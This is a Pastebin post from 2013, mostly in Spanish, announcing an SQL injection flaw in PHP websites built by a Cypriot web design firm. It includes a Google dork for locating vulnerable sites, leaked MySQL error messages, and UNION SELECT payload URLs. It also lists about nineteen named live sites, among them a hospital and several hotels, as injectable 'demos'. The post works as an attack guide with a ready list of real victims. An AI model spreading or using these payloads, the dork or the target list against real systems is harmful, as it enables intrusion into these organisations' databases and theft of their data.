Advertisement
diego123

(0day) debliteckservices / SQL Injection vulnerability

Feb 2nd, 2013
263
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.77 KB | None | 0 0
  1. # Exploit Title: debliteckservices / SQL Injection vulnerability
  2. # Date: 02/02/2013
  3. # Exploit Author: Diego_Asencio || r4z0r_bl4ck
  4. # Twitter: @r4z0r_bl4ck
  5. # Blog: http://r4z0rbl4ck.wordpress.com/
  6. # Vendor Homepage: http://www.debliteckservices.com/
  7. # Tested on: Windows Ultimate - Linux Ubuntu
  8. # Categoria: WebApps - PHP
  9. # Google Dork: inurl:gallery.php?id= intext:Debliteck
  10. # WorkGroup: @inside0utside
  11.  
  12.  
  13. -= INFORMACION =-
  14.  
  15. La empresa debliteckservices dedicada al diseño y desarrollo web, dentro de su portafolio de trabajo contiene paginas web en lenguaje PHP con vulnerabilidad de SQL, la cual permite al atacante inyectar peticiones o consultas a la base de datos.
  16.  
  17.  
  18.  
  19. -= MYSQL ERROR's =-
  20.  
  21. 1) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and state='ACTIVE' order by sort limit 0,12' at line 1
  22.  
  23. 2) Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/h/o/domain/public_html/include/function.php on line 97
  24.  
  25. 3) Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/x/y/domain/public_html/header.php on line 82
  26.  
  27. 4) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/n/o/domain/web/public_html/header.php on line 13
  28.  
  29.  
  30.  
  31.  
  32. -= XPL (PoC) =-
  33.  
  34. http://127.0.0.1/gallery.php?id=1+union+all+select+0,1,2,3,4--
  35.  
  36. http://127.0.0.1/section.php?id=1+union+all+select+0,1,2,3,4--
  37.  
  38. http://127.0.0.1/article.php?id=1+union+all+select+0,1,2,3,4--
  39.  
  40.  
  41.  
  42. -= DEMO's =-
  43.  
  44. http://www.st-raphaelhospital.com/gallery.php?id=6' (SQLi)
  45. http://www.coralsearesorts.eu/gallery.php?id=15' (SQLi)
  46. http://www.nplanitis.com/gallery.php?id=8' (SQLi)
  47. http://www.camel-park.com/gallery.php?id=2' (SQLi)
  48. http://www.underseawalkers.com/gallery.php?id=1' (SQLi)
  49. http://www.bellsinn.com/gallery.php?id=2' (SQLi)
  50. http://www.olympicresidence.com/gallery.php?id=13' (SQLi)
  51. http://www.kanika-ibc.com/gallery.php?id=2' (SQLi)
  52. http://www.limocy.com/gallery.php?id=4' (SQLi)
  53. http://www.demetriseliaproperties.com/gallery.php?id=3' (SQLi)
  54. http://www.forcecars.com/gallery.php?id=1' (SQLi)
  55. http://www.newfamagustahotel.com/gallery.php?id=6' (SQLi)
  56.  
  57. http://d-kombosdevelopers.com/gallery.php?id=7' (SQLi)
  58. http://xylophagou.com/gallery.php?id=3' (SQLi)
  59. http://www.easyriders.com.cy/gallery.php?id=3' (SQLi)
  60. http://www.agf.com.cy/gallery.php?id=1' (SQLi)
  61.  
  62. http://www.nissi-beach.com/section.php?id=20' (SQLi)
  63. http://www.hotelsayianapa.com/section.php?id=7' (SQLi)
  64.  
  65. http://www.nozomi.com.cy/article.php?id=45' (SQLi)
  66.  
  67.  
  68.  
  69. #################################
  70. Agradecimientos a: @Sr_Xaoc
  71.  
  72. @inside0utside - t34m /
  73. - all members
  74.  
  75. @r4z0r_bl4ck
  76. @sr_xaoc
  77. @MaximusWell
  78. @MikeSoft
  79. -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement